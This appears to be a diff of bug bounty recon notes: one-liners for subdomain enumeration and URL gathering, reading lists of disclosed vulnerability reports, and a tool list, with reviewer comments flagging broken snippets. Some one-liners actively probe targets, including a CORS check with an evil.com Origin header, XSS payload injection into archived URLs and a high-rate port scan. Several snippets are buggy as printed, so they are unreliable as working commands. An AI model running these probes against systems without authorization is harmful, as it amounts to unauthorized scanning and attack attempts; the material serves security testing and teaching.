     162 +curl -s "https://www.virustotal.com/ui/domains/HOST/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
     163 +```
     164 + 
     165 +#### Get Subdomain with cyberxplore
     166 + 
     167 +> @pikpikcu
     168 + 
     169 +```
     170 +curl https://subbuster.cyberxplore.com/api/find?domain=HOST -s | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+"
     171 +```
     172 + 
     173 +#### Get Subdomains from CertSpotter
     174 + 
     175 +> @caryhooper
     176 + 
     177 +```bash
     178 +curl -s "https://certspotter.com/api/v1/issuances?domain=HOST&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
     179 +```
     180 + 
     181 +#### Get Subdomains from Archive
     182 + 
     183 +> @pikpikcu
     184 + 
     185 +```bash
     186 +curl -s "http://web.archive.org/cdx/search/cdx?url=*.HOST/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u
     187 +```
     188 + 
     189 +#### Get Subdomains from JLDC
     190 + 
     191 +> @pikpikcu
     192 + 
     193 +```bash
     194 +curl -s "https://jldc.me/anubis/subdomains/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
     195 +```
     196 + 
     197 +#### Get Subdomains from securitytrails
     198 + 
     199 +> @pikpikcu
     200 + 
     201 +```bash
     202 +curl -s "https://securitytrails.com/list/apex_domain/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u
     203 +```
     204 + 
     205 +#### Bruteforcing Subdomain using DNS Over
     206 + 
     207 +> @pikpikcu
     208 + 
     209 +```
     210 +while read sub; do echo "https://dns.google.com/resolve?name=$sub.HOST&type=A&cd=true" | parallel -j100 -q curl -s -L --silent | grep -Po '[{\[]{1}([,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]|".*?")+[}\]]{1}' | jq | grep "name" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u ; done < FILE.txt
     211 +```
     212 + 
     213 +#### Get Subdomains With sonar.omnisint.io
     214 + 
     215 +> @pikpikcu
     216 + 
     217 +```
     218 +curl --silent https://sonar.omnisint.io/subdomains/HOST | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u
     219 +```
     220 + 
     221 +#### Get Subdomains With synapsint.com
     222 + 
     223 +> @pikpikcu
     224 + 
     225 +```
     226 +curl --silent -X POST https://synapsint.com/report.php -d "name=https%3A%2F%2FHOST" | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u
     227 +```
     228 + 
     229 +#### Get Subdomains from crt.sh
     230 + 
     231 +> @vict0ni
     232 + 
     233 +```bash
     234 +curl -s "https://crt.sh/?q=%25.HOST&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
     235 +```
     236 + 
     237 +#### Sort & Tested Domains from Recon.dev
     238 + 
     239 +> @stokfedrik
     240 + 
     241 +```bash
     242 +curl "https://recon.dev/api/search?key=apikey&domain=HOST" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u | httpx -silent
     243 +```
     244 + 
     245 +#### Subdomain Bruteforcer with FFUF
     246 + 
     247 +> @GochaOqradze
     248 + 
     249 +```bash
     250 +ffuf -u https://FUZZ.HOST -w FILE.txt -v | grep "| URL |" | awk '{print $4}'
     251 +```
     252 + 
     253 +#### Find Allocated IP Ranges for ASN from IP Address
     254 + 
     255 +> wains.be
     256 + 
     257 +```bash
     258 +whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net IP | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n
     259 +```
     260 + 
     261 +#### Extract IPs from a File
     262 + 
     263 +> @emenalf
     264 + 
     265 +```bash
     266 +grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt
     267 +```
     268 + 
     269 +#### Ports Scan without CloudFlare
     270 + 
     271 +> @dwisiswant0
     272 + 
     273 +```bash
     274 +subfinder -silent -d HOST | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobe
     275 +```
     276 + 
     277 +#### Create Custom Wordlists
     278 + 
     279 +> @tomnomnom
     280 + 
     281 +```bash
     282 +gau HOST | unfurl -u keys | tee -a FILE1.txt; gau HOST | unfurl -u paths | tee -a FILE2.txt; sed 's#/#\n#g' FILE2.txt | sort -u | tee -a FILE1.txt | sort -u; rm FILE2.txt | sed -i -e 's/\.css\|\.png\|\.jpeg\|\.jpg\|\.svg\|\.gif\|\.wolf\|\.bmp//g' FILE1.txt
     283 +```
     284 + 
     285 +```bash
     286 +cat HOSTS.txt | httprobe | xargs curl | tok | tr '[:upper:]' '[:lower:]' | sort -u | tee -a FILE.txt
     287 +```
     288 + 
     289 +#### Extracts Juicy Informations
     290 + 
     291 +> @Prial Islam Khan
     292 + 
     293 +```bash
     294 +for sub in $(cat HOSTS.txt); do gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq | egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a OUT.txt ;done
     295 +```
     296 + 
     297 +#### Find Subdomains TakeOver
     298 + 
     299 +> @hahwul
     300 + 
     301 +```bash
     302 +subfinder -d HOST >> FILE; assetfinder --subs-only HOST >> FILE; amass enum -norecursive -noalts -d HOST >> FILE; subjack -w FILE -t 100 -timeout 30 -ssl -c $GOPATH/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ;
     303 +```
     304 + 
     305 +#### Dump Custom URLs from ParamSpider
     306 + 
     307 +> @hahwul
     308 + 
     309 +```bash
     310 +cat HOSTS.txt | xargs -I % python3 paramspider.py -l high -o ./OUT/% -d %;
     311 +```
     312 + 
     313 +#### URLs Probing with cURL + Parallel
     314 + 
     315 +> @akita\_zen
     316 + 
     317 +```bash
     318 +cat HOSTS.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk
     319 +```
     320 + 
     321 +#### Dump In-scope Assets from `chaos-bugbounty-list`
     322 + 
     323 +> @dwisiswant0
     324 + 
     325 +```bash
     326 +curl -sL https://github.com/projectdiscovery/public-bugbounty-programs/raw/master/chaos-bugbounty-list.json | jq -r '.programs[].domains | to_entries | .[].value'
     327 +```
     328 + 
     329 +#### Dump In-scope Assets from `bounty-targets-data`
     330 + 
     331 +> @dwisiswant0
     332 + 
     333 +**HackerOne Programs**
     334 + 
     335 +```bash
     336 +curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'
     337 +```
     338 + 
     339 +**BugCrowd Programs**
     340 + 
     341 +```bash
     342 +curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
     343 +```
     344 + 
     345 +**Intigriti Programs**
     346 + 
     347 +```bash
     348 +curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'
     349 +```
     350 + 
     351 +**YesWeHack Programs**
     352 + 
     353 +```bash
     354 +curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/yeswehack_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
     355 +```
     356 + 
     357 +**HackenProof Programs**
     358 + 
     359 +```bash
     360 +curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/hackenproof_data.json | jq -r '.[].targets.in_scope[] | [.target, .type, .instruction] | @tsv'
     361 +```
     362 + 
     363 +**Federacy Programs**
     364 + 
     365 +```bash
     366 +curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/federacy_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
     367 +```
     368 + 
     369 +#### Dump URLs from sitemap.xml
     370 + 
     371 +> @healthyoutlet
     372 + 
     373 +```bash
     374 +curl -s http://HOST/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g'
     375 +```
     376 + 
     377 +#### Pure Bash Linkfinder
     378 + 
     379 +> @ntrzz
     380 + 
     381 +```bash
     382 +curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > FILE.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < FILE.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf FILE.txt
     383 +```
     384 + 
     385 +#### Extract Endpoints from swagger.json
     386 + 
     387 +> @zer0pwn
     388 + 
     389 +```bash
     390 +curl -s https://HOST/v2/swagger.json | jq '.paths | keys[]'
     391 +```
     392 + 
     393 +#### CORS Misconfiguration
     394 + 
     395 +> @manas\_hunter
     396 + 
     397 +```bash
     398 +site="URL"; gau "$site" | while read url; do target=$(curl -sIH "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found] echo $url; else echo Nothing on "$url"; fi; done
     399 +```
     400 + 
     401 +#### Find Hidden Servers and/or Admin Panels
     402 + 
     403 +> @rez0\_\_
     404 + 
     405 +```bash
     406 +ffuf -c -u URL -H "Host: FUZZ" -w FILE.txt
     407 +```
     408 + 
     409 +#### Recon Using api.recon.dev
     410 + 
     411 +> @z0idsec
     412 + 
     413 +```bash
     414 +curl -s -w "\n%{http_code}" https://api.recon.dev/search?domain=HOST | jg .[].domain
     415 +```
     416 + 
     417 +#### Find Live Host/Domain/Assets
     418 + 
     419 +> @_YashGoti_
     420 + 
     421 +```bash
     422 +subfinder -d HOST -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u
     423 +```
     424 + 
     425 +#### XSS without gf
     426 + 
     427 +> @HacktifyS
     428 + 
     429 +```bash
     430 +waybackurls HOST | grep '=' | qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -sk --path-as-is "$host" | grep -qs "<script>alert(1)</script>" && echo "$host is vulnerable"; done
     431 +```
     432 + 
     433 +#### Get Subdomains from IPs
     434 + 
     435 +> @laughface809
     436 + 
     437 +```bash
     438 +python3 hosthunter.py HOSTS.txt > OUT.txt
     439 +```
     440 + 
     441 +#### Gather Domains from Content-Security-Policy
     442 + 
     443 +> @geeknik
     444 + 
     445 +```bash
     446 +curl -vs URL --stderr - | awk '/^content-security-policy:/' | grep -Eo "[a-zA-Z0-9./?=_-]*" | sed -e '/\./!d' -e '/[^A-Za-z0-9._-]/d' -e 's/^\.//' | sort -u
     447 +```
     448 + 
     449 +#### Nmap IP:PORT Parser Piped to HTTPX
     450 + 
     451 +> @dwisiswant0
     452 + 
     453 +```bash
     454 +nmap -v0 HOST -oX /dev/stdout | jc --xml -p | jq -r '.nmaprun.host | (.address["@addr"] + ":" + .ports.port[]["@portid"])' | httpx --silent
     455 +```
     456 + 
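Review bot: the CORS one-liner under "CORS Misconfiguration" cannot work as written: `target=$(curl ...) | if grep 'https://evil.com'; then ...` pipes the stdout of a variable assignment, which is empty, into grep, so the match never fires and every URL prints "Nothing on", and the bracketed `[Potentional CORS Found]` is not valid shell (it is parsed as a `[` test). Suggest `if curl -sk -o /dev/null -D - -H "Origin: https://evil.com" "$url" | grep -qi '^access-control-allow-origin: https://evil.com'; then echo "[Potential CORS] $url"; fi`, and checking for `Access-Control-Allow-Credentials: true` as well, since a reflected origin without credentials is far lower impact. Several other snippets carry copy errors that fail on first run: "Recon Using api.recon.dev" calls `jg` instead of `jq`; "XSS without gf" has `while read host do ; do`, which should be `while read host; do`; "Create Custom Wordlists" ends in `rm FILE2.txt | sed -i ... FILE1.txt`, where the pipe does nothing useful (use `;`) and `\.wolf` is presumably `\.woff`; and the "Bruteforcing Subdomain using DNS Over" heading is cut off (the `dns.google.com/resolve` call is DNS over HTTPS) while the loop echoes a single URL per iteration into `parallel -j100`, so nothing actually runs in parallel. Two caveats the reader should get: the XSS check greps for the raw `<script>alert(1)</script>` string without looking at Content-Type, so a reflection in a JSON or text/plain response is reported as "vulnerable" even though it does not execute, and `naabu -rate 40000` under "Ports Scan without CloudFlare" is aggressive enough to trip rate limits or be read as a DoS against a live program target.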
  • ■ ■ ■ ■ ■ ■
    overview/recon-tips/resources/README.md
     1 +# Resources
     2 + 
     3 +## <mark style="color:green;">**Bug Bounty Resources & Disclosed Reports: A Valuable Collection of Insights 📝**</mark>
     4 + 
     5 +* [Starting out](https://github.com/HolyBugx/HolyTips/tree/main/Resources#Starting-Out)
     6 +* [Books](https://github.com/HolyBugx/HolyTips/tree/main/Resources#Books)
     7 +* [Blogs](https://github.com/HolyBugx/HolyTips/tree/main/Resources#Blogs)
     8 +* [Training Platforms](https://github.com/HolyBugx/HolyTips/tree/main/Resources#Training-Platforms)
     9 +* [Web Security](https://github.com/HolyBugx/HolyTips/tree/main/Resources#Web-Security)
     10 +* [Recon](https://github.com/HolyBugx/HolyTips/tree/main/Resources#Recon)
     11 +* [XSS](https://github.com/HolyBugx/HolyTips/tree/main/Resources#XSS)
     12 +* [CSRF](https://github.com/HolyBugx/HolyTips/tree/main/Resources#CSRF)
     13 +* [IDOR](https://github.com/HolyBugx/HolyTips/tree/main/Resources#IDOR)
     14 +* [Open Redirect](https://github.com/HolyBugx/HolyTips/tree/main/Resources#Open-Redirect)
     15 +* [Race Condition](https://github.com/HolyBugx/HolyTips/tree/main/Resources#Race-Condition)
     16 +* [Subdomain Takeover](https://github.com/HolyBugx/HolyTips/tree/main/Resources#Subdomain-Takeover)
     17 +* [SSRF](https://github.com/HolyBugx/HolyTips/tree/main/Resources#SSRF)
     18 +* [XXE](https://github.com/HolyBugx/HolyTips/tree/main/Resources#XXE)
     19 +* [SQLi](https://github.com/HolyBugx/HolyTips/tree/main/Resources#SQLi)
     20 +* [Misc](https://github.com/HolyBugx/HolyTips/tree/main/Resources#Misc)
     21 + 
     22 +***
     23 + 
     24 +### <mark style="color:green;">Starting-Out</mark>
     25 + 
     26 +* [PortSwigger's Learning Path](https://portswigger.net/web-security/learning-path)
     27 +* [Cobalt Vulnerability Wiki](https://cobalt.io/vulnerability-wiki/)
     28 +* [OWASP Top 10 Web Training](https://application.security/free/owasp-top-10)
     29 +* [OWASP Top 10 API Training](https://application.security/free/owasp-top-10-API)
     30 +* [Web Security Course](https://web.stanford.edu/class/cs253/)
     31 + 
     32 +***
     33 + 
     34 +### <mark style="color:green;">Books</mark>
     35 + 
     36 +* [The Web Application Hacker's Handbook, 2nd Edition](https://www.oreilly.com/library/view/the-web-application/9781118026472)
     37 +* [Web Hacking 101](https://leanpub.com/web-hacking-101)
     38 +* [Real-World Bug Hunting](https://www.amazon.com/gp/product/B072SQZ2LG)
     39 +* [The Tangled Web](https://www.amazon.com/Tangled-Web-Securing-Modern-Applications/dp/1593273886)
     40 +* [The Hacker Playbook 2](https://www.amazon.com/Hacker-Playbook-Practical-Penetration-Testing-ebook/dp/B01072WJZE)
     41 +* [The Hacker Playbook 3](https://www.amazon.com/Hacker-Playbook-Practical-Penetration-Testing-ebook/dp/B07CSPFYZ2)
     42 + 
     43 +***
     44 + 
     45 +### <mark style="color:green;">Blogs</mark>
     46 + 
     47 +* [Assetnote](https://blog.assetnote.io/)
     48 +* [Secjuice](https://www.secjuice.com/)
     49 +* [James Kettle](https://skeletonscribe.net/)
     50 +* [Orange Tsai](https://blog.orange.tw/)
     51 +* [Sam Curry](https://samcurry.net/blog/)
     52 +* [Patrik Hudak](https://0xpatrik.com/)
     53 +* [Honoki](https://honoki.net/)
     54 + 
     55 +***
     56 + 
     57 +### <mark style="color:green;">Training-Platforms</mark>
     58 + 
     59 +* [BugBountyHunter.com](https://bugbountyhunter.com)
     60 +* [PentesterLab](https://pentesterlab.com)
     61 +* [HackTheBox](https://www.hackthebox.eu/home)
     62 +* [TryHackMe](https://tryhackme.com)
     63 +* [Rootme](https://www.root-me.org/?lang=en)
     64 +* [PicoCTF](https://picoctf.org)
     65 +* [GoogleCTF](https://capturetheflag.withgoogle.com)
     66 + 
     67 +***
     68 + 
     69 +### <mark style="color:green;">Web-Security</mark>
     70 + 
     71 +* [Finding The Origin IP Behind CDNs](https://infosecwriteups.com/finding-the-origin-ip-behind-cdns-37cd18d5275)
     72 +* [Accessing cross-site data using JSONP](https://www.sjoerdlangkemper.nl/2019/01/02/jsonp/)
     73 +* [Hacking the SOP](https://medium.com/swlh/hacking-the-same-origin-policy-f9f49ad592fc)
     74 +* [LocalStorage vs Cookie XSS](https://academind.com/tutorials/localstorage-vs-cookies-xss/)
     75 +* [Cross-Site script inclusion](https://www.scip.ch/en/?labs.20160414)
     76 +* [How to Hunt Bugs in SAML; a Methodology - Part I](https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/)
     77 +* [How to Hunt Bugs in SAML; a Methodology - Part II](https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/)
     78 +* [How to Hunt Bugs in SAML; a Methodology - Part III](https://epi052.gitlab.io/notes-to-self/blog/2019-03-16-how-to-test-saml-a-methodology-part-three/)
     79 +* [SAML Attack Surface](https://github.com/kelbyludwig/saml-attack-surface)
     80 + 
     81 +***
     82 + 
     83 +### <mark style="color:green;">Recon</mark>
     84 + 
     85 +* [The Bug Hunter's Methodology v4.0 - Recon Edition](https://youtu.be/p4JgIu1mceI)
     86 +* [Fundamentals of Bug Bounty Recon](https://youtu.be/DABPWQ40yb0)
     87 +* [How To Do Recon: Introduction to Recon](https://youtu.be/o8L2nweiF1s)
     88 +* [Just another Recon Guide for Pentesters and Bug Bounty Hunters](https://www.offensity.com/de/blog/just-another-recon-guide-pentesters-and-bug-bounty-hunters/)
     89 +* [The Best Bug Bounty Recon Methodology](https://securib.ee/beelog/the-best-bug-bounty-recon-methodology/)
     90 +* [The Art of Subdomain Enumeration](https://appsecco.com/books/subdomain-enumeration/)
     91 + 
     92 +***
     93 + 
     94 +### <mark style="color:green;">XSS</mark>
     95 + 
     96 +* [Instagram Reflected XSS](https://ysamm.com/?p=695)
     97 +* [XSS in Facebook CDN](https://ysamm.com/?p=632)
     98 +* [XSS on forums.oculusvr.com](https://ysamm.com/?p=525)
     99 +* [Persistent DOM-based XSS in https://help.twitter.com via localStorage](https://hackerone.com/reports/297968)
     100 +* [DOM XSS on app.starbucks.com via ReturnUrl](https://hackerone.com/reports/526265)
     101 +* [XSS in steam react chat client](https://hackerone.com/reports/409850)
     102 +* [XSS while logging using Google](https://hackerone.com/reports/691611)
     103 +* [Stored XSS in RDoc wiki pages](https://hackerone.com/reports/662287)
     104 + 
     105 +***
     106 + 
     107 +### <mark style="color:green;">CSR</mark>F
     108 + 
     109 +* [CSRF on connecting Paypal as Payment Provider](https://hackerone.com/reports/807924)
     110 +* [CSRF on Periscope Web OAuth authorization endpoint](https://hackerone.com/reports/215381)
     111 +* [CSRF combined with IDOR within Document Converter exposes files](https://hackerone.com/reports/398316)
     112 +* [CSRF in all API endpoints when authenticated using HTTP Authentication](https://hackerone.com/reports/195156)
     113 +* [The mass CSRFing of \*.google.com/\* products.](http://www.missoumsai.com/google-csrfs.html)
     114 +* [Facebook CSRF bug which lead to Instagram Partial account takeover.](https://ysamm.com/?p=379)
     115 +* [Media deletion CSRF vulnerability on Instagram](https://blog.darabi.me/2019/12/instagram-delete-media-csrf.html)
     116 +* [Facebook CSRF protection bypass which leads to Account Takeover](https://ysamm.com/?p=185)
     117 + 
     118 +***
     119 + 
     120 +### <mark style="color:green;">IDOR</mark>
     121 + 
     122 +* [IDOR bug to See hidden slowvote of any user even when you dont have access right](https://hackerone.com/reports/661978)
     123 +* [IDOR allow access to payments data of any user](https://hackerone.com/reports/751577)
     124 +* [IDOR Causing Deletion of any account](https://hackerone.com/reports/156537)
     125 +* [IDOR allow to extract all registered email](https://hackerone.com/reports/302485)
     126 +* [Another image removal vulnerability on Facebook](https://blog.darabi.me/2020/06/image-removal-vulnerability-on-facebook.html)
     127 +* [Gsuite Hangouts Chat 5k IDOR](https://secreltyhiddenwriteups.blogspot.com/2018/07/gsuite-hangouts-chat-5k-idor.html)
     128 +* [How I pwned a company using IDOR and Blind XSS](https://www.ansariosama.com/2017/11/how-i-pwned-company-using-idor-blind-xss.html)
     129 +* [Disclose Private Dashboard Chart's name and data in Facebook Analytics](https://bugreader.com/jubabaghdad@disclose-private-dashboard-charts-name-and-data-in-facebook-analytics-184)
     130 + 
     131 +***
     132 + 
     133 +### <mark style="color:green;">Open-Redirect</mark>
     134 + 
     135 +* [Open Redirects that matter](https://sites.google.com/site/bughunteruniversity/best-reports/openredirectsthatmatter)
     136 +* [XSS and Open Redirect on MoPub Login](https://hackerone.com/reports/683298)
     137 +* [XSS and Open Rredirect on supporthiring.shopify.com](https://hackerone.com/reports/158434)
     138 +* [Open Redirect in secure.showmax.com](https://medium.com/@ahmadbrainworks/bug-bounty-how-i-earned-550-in-less-than-5-minutes-open-redirect-chained-with-rxss-8957979070e5)
     139 +* [Open Redirect on streamlabs.com](https://hackerone.com/reports/978680)
     140 +* [Open Redirect on "Language change"](https://hackerone.com/reports/52035)
     141 +* [Open Redirect idp.fr.cloud.gov](https://hackerone.com/reports/387007)
     142 +* [Airbnb chaining third party open redirect into SSRF via liveperson chat](https://buer.haus/2017/03/09/airbnb-chaining-third-party-open-redirect-into-server-side-request-forgery-ssrf-via-liveperson-chat/)
     143 +* [Oauth authentication bypass on airbnb acquistion using wierd 1 char open redirect](https://xpoc.pro/oauth-authentication-bypass-on-airbnb-acquisition-using-weird-1-char-open-redirect/)
     144 + 
     145 +***
     146 + 
     147 +### <mark style="color:green;">Race-Condition</mark>
     148 + 
     149 +* [Race Condition in performing retest allows duplicated payments](https://hackerone.com/reports/429026)
     150 +* [Race Conditions in OAuth 2 API implementations](https://hackerone.com/reports/55140)
     151 +* [Race Condition in Flash workers may cause an exploitable double free](https://hackerone.com/reports/37240)
     152 +* [Exploiting a Race condition vulnerabililty](https://medium.com/@vincenz/exploiting-a-race-condition-vulnerability-3f2cb387a72)
     153 +* [Race Condition leads to undeletable group member](https://hackerone.com/reports/604534)
     154 +* [Race Condition on web](https://www.josipfranjkovic.com/blog/race-conditions-on-web)
     155 +* [Race Condition in account survey](https://hackerone.com/reports/165570)
     156 +* [Race Condition at create new Location](https://hackerone.com/reports/413759)
     157 + 
     158 +***
     159 + 
     160 +### <mark style="color:green;">Subdomain-Takeover</mark>
     161 + 
     162 +* [Subdomain Takeover to Authentication bypass](https://hackerone.com/reports/335330)
     163 +* [Subdomain Takeover on happymondays.starbucks.com due to non-used AWS S3 DNS record](https://hackerone.com/reports/186766)
     164 +* [Subdomain Takeover on wfmnarptpc.starbucks.com](https://hackerone.com/reports/388622)
     165 +* [Subdomain Takeover on svcgatewaydevus.starbucks.com and svcgatewayloadus.starbucks.com](https://hackerone.com/reports/383564)
     166 +* [Subdomain Takeover: new level](https://medium.com/bugbountywriteup/subdomain-takeover-new-level-43f88b55e0b2)
     167 +* [Subdomain Takeover on svcardproxydevus.starbucks.com](https://hackerone.com/reports/380158)
     168 +* [Subdomain Takeover on blog.greenhouse.io pointing to Hubspot](https://hackerone.com/reports/38007)
     169 +* [Subdomain Takeover on openapi.starbucks.com](https://hackerone.com/reports/241503)
     170 + 
     171 +***
     172 + 
     173 +### <mark style="color:green;">SSRF</mark>
     174 + 
     175 +* [SSRF in Exchange leads to ROOT access in all instances](https://hackerone.com/reports/341876)
     176 +* [SSRF using Javascript allows to exfill data from Google Metadata](https://hackerone.com/reports/530974)
     177 +* [SSRF in Google cloud platform stackdriver](https://ngailong.wordpress.com/2019/12/19/google-vrp-ssrf-in-google-cloud-platform-stackdriver/)
     178 +* [SSRF to ROOT Access](https://hackerone.com/reports/341876)
     179 +* [SSRF reading local files from downnotifier server](https://www.openbugbounty.org/blog/leonmugen/ssrf-reading-local-files-from-downnotifier-server/)
     180 +* [Facebook SSRF](https://medium.com/@amineaboud/10000-facebook-ssrf-bug-bounty-402bd21e58e5)
     181 +* [31k$ SSRF in Google Cloud Monitoring led to metadata exposure](https://nechudav.blogspot.com/2020/11/31k-ssrf-in-google-cloud-monitoring.html)
     182 +* [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
     183 + 
     184 +***
     185 + 
     186 +### <mark style="color:green;">XXE</mark>
     187 + 
     188 +* [XXE at ecjobs.starbucks.com.cn](https://hackerone.com/reports/500515)
     189 +* [XXE on sms-be-vip.twitter.com in SXMP Processor](https://hackerone.com/reports/248668)
     190 +* [XXE and SSRF on webmaster.mail.ru](https://hackerone.com/reports/12583)
     191 +* [XXE in Site Audit function exposing file and directory contents](https://hackerone.com/reports/312543)
     192 +* [Blind OOB XXE on ubermovement.com](https://hackerone.com/reports/154096)
     193 +* [XXE over which leads to RCE](https://hackerone.com/reports/55431)
     194 +* [LFI and SSRF via XXE in emblem editor](https://hackerone.com/reports/347139)
     195 +* [Non-production Open Database In Combination With XXE Leads To SSRF](https://hackerone.com/reports/742808)
     196 + 
     197 +***
     198 + 
     199 +### <mark style="color:green;">SQLi</mark>
     200 + 
     201 +* [Bypassing a crappy WAF to exploit a blind SQLI](https://robinverton.de/blog/2019/08/25/bug-bounty-bypassing-a-crappy-waf-to-exploit-a-blind-sql-injection/)
     202 +* [Magix Bug Bounty: magix.com (RCE, SQLi) and xara.com (LFI, XSS)](https://www.rcesecurity.com/2014/04/magix-bug-bounty-magix-com-rce-sqli-and-xara-com-lfi-xss/)
     203 +* [Tesla Motors blind SQLI](https://bitquark.co.uk/blog/2014/02/23/tesla\_motors\_blind\_sql\_injection)
     204 +* [Blind SQL Injection on windows10.hi-tech.mail.ru](https://hackerone.com/reports/786044)
     205 +* [Blind SQLi leading to RCE, from Unauthenticated access to a test API Webservice](https://hackerone.com/reports/592400)
     206 +* [Step by Step Exploiting SQL Injection in Oculus](https://josipfranjkovic.blogspot.com/2014/09/step-by-step-exploiting-sql-injection.html)
     207 +* [SQL Injection in lapsuudenturva](https://hackerone.com/reports/191146)
     208 +* [SQL Injection Root Access tw.yahoo.com](https://buer.haus/2015/01/15/yahoo-root-access-sql-injection-tw-yahoo-com/)
     209 + 
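Review bot: the CSRF heading is mis-tagged: `### <mark style="color:green;">CSR</mark>F` closes the highlight one character early, so it renders as a highlighted "CSR" followed by a plain "F"; move the `</mark>` after the F to match every other heading in the file. The SSRF list carries the same report twice under different titles ("SSRF in Exchange leads to ROOT access in all instances" and "SSRF to ROOT Access" both link to hackerone.com/reports/341876); drop one. The table of contents at the top links to `github.com/HolyBugx/HolyTips/tree/main/Resources#...` rather than to the sections on this page, which sends the reader off-site and shows the list is lifted from HolyTips; either turn them into in-page anchors (`#starting-out`, `#books`, ...) and add a one-line credit to the source, or keep the external links and say that is where the list comes from. Link-text typos worth fixing while here: "Open Rredirect", "acquistion using wierd" (the URL slug has "acquisition" and "weird") and "vulnerabililty".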
  • ■ ■ ■ ■ ■ ■
    overview/recon-tips/resources/introducing-20-web-application-hacking-tools.md
     1 +# Introducing 20 web-application hacking tools🔥🤩🌵
     2 + 
     3 +Here are some powerful tools for various security testing purposes, including vulnerability assessment, reconnaissance, and exploitation:
     4 + 
     5 +1. [Burp Suite](https://portswigger.net/burp) - A comprehensive web application security framework.
     6 +2. [ZAP Proxy](https://www.zaproxy.org/) - An open-source web application security scanner and proxy.
     7 +3. [Dirsearch](https://github.com/maurosoria/dirsearch) - A tool for brute-forcing directories and files on web servers.
     8 +4. [Nmap](https://nmap.org/) - A versatile and widely-used port scanning and network exploration tool.
     9 +5. [Sublist3r](https://github.com/aboul3la/Sublist3r) - A subdomain discovery tool that enumerates subdomains using multiple search engines.
     10 +6. [Amass](https://github.com/OWASP/Amass) - A versatile subdomain enumeration and information gathering tool.
     11 +7. [SQLmap](http://sqlmap.org/) - An automatic SQL injection and database takeover tool.
     12 +8. [Metasploit](https://www.metasploit.com/) - A powerful framework for developing, testing, and executing exploits.
     13 +9. [WPscan](https://wpscan.com/) - A WordPress vulnerability scanner and exploitation tool.
     14 +10. [Nikto](https://cirt.net/Nikto2) - A web server scanner that identifies potential vulnerabilities.
     15 +11. [HTTPX](https://github.com/projectdiscovery/httpx) - A fast and multi-purpose HTTP probing tool.
     16 +12. [Nuclei](https://nuclei.projectdiscovery.io/) - A fast and customizable vulnerability scanner that uses YAML-based templates.
     17 +13. [FFUF](https://github.com/ffuf/ffuf) - A fast web fuzzer used for discovering hidden files and directories.
     18 +14. [Subfinder](https://github.com/projectdiscovery/subfinder) - A subdomain discovery tool that uses passive online sources.
     19 +15. [Masscan](https://github.com/robertdavidgraham/masscan) - A high-speed IP and port scanner.
     20 +16. [Lazy Recon](https://github.com/nahamsec/lazyrecon) - A script that automates various subdomain discovery techniques.
     21 +17. [XSS Hunter](https://xsshunter.com/) - A platform for finding and tracking blind Cross-Site Scripting (XSS) vulnerabilities.
     22 +18. [Aquatone](https://github.com/michenriksen/aquatone) - A tool for performing HTTP-based reconnaissance and screenshots.
     23 +19. [LinkFinder](https://github.com/GerbenJavado/LinkFinder) - A tool to discover endpoints and links in JavaScript files.
     24 +20. [JS-Scan](https://github.com/dark-warlord14/JS-Scan) - A tool for discovering endpoints in JavaScript files.
